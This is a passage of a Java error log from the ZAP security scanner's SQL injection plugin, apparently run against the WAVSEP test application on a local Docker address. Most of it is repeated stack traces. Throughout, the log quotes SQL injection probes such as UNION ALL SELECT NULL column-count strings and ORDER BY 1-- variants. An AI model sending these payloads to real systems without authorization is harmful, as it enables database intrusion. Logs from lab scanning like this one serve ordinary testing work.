org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680848 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680849 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680849 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680850 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680850 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680851 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680852 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680853 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680853 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680854 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680854 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680855 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680856 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1#] due to an I/O error 